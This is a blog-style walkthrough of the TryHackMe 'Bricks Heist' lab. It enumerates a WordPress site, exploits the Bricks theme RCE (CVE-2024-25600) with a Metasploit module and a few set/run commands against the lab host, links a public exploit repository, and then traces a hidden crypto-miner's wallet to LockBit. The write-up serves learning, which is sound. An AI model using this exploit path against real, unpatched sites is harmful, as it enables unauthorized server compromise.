chirpy-starter/_posts/2024-9-5-tryhackme-bricks-heist.md
2024-12-19 10:18:30 +08:00

3.5 KiB

title author categories tags render_with_liquid media_subpath image
TryHackMe: TryHack3M: Bricks Heist AmcaQt
TryHackMe
web
enumeration
rce
false /images/thm_bricks_heist/
path
room_card.png

Tryhackme Room Link{: width="600" height="150" .shadow } https://tryhackme.com/r/room/tryhack3mbricksheist

Description

Brick Press Media Co. was working on creating a brand-new web theme that represents a renowned wall using three million byte bricks. Agent Murphy comes with a streak of bad luck. And here we go again: the server is compromised, and they've lost access.

Can you hack back the server and identify what happened there?

Note : Add MACHINE_IP bricks.thm to your /etc/hosts file.

Question & Flag

What is the content of the hidden .txt file in the web folder?

First, before do further enumaration, let's run the basic scan with nmap

Nmap Scan

Interesting find here, without wasting any time let's look further with WpScan

The scan shows the site using Theme bricks with version 1.9.5, after some research and finding we found the version is Vuln to Unauthenticated RCE

Remote Code Execution

The exploit and cve for the version is on github but i want to use metasploit to speed up the exploit

https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT

Power up your msfconsole and search for bricks, you shall find the matching modules

simply use command use 0 and fill in the require and you shall get the shell

set LHOST 10.8.58.21
set RHOSTS https://bricks.thm
set RPORT 443
run

with that you may find the answer for Task 1

What is the name of the suspicious process? & What is the service name affiliated with the suspicious process?

For this one go to google and do some research about it , then you'll found the command

get back to the terminal and try out the command

but this is not the answer, let's try view the content of the service

That's what we want

What is the log file name of the miner instance?

Notice that the service is executing from /lib/NetworkManager/ directory, go to that directory

What is the wallet address of the miner instance? & The wallet address used has been involved in transactions between wallets belonging to which threat group?

Using the strings on the log file that we view earlier, try to decode with CyberChef

kinda lost on what that is, but since we searched about wallet address so i did some research

so i need to confirm it, go to Blockchair , lucky it was the correct one, so i went down to the last payment received

Inside that transaction history and from there, inside the privacy check

We can see the details on the transaction

Copy the sender address and search it on google, most of the result return LockBit

Source :

https://ofac.treasury.gov/recent-actions/20240220

https://www.chainalysis.com/blog/lockbit-takedown-sanctions-february-2024/

Conclusion

This was fun Room and good for beginner to learn about CVE and how risky Outdated version of CMS such as WordPress.

Happy Hacking

Cute Gif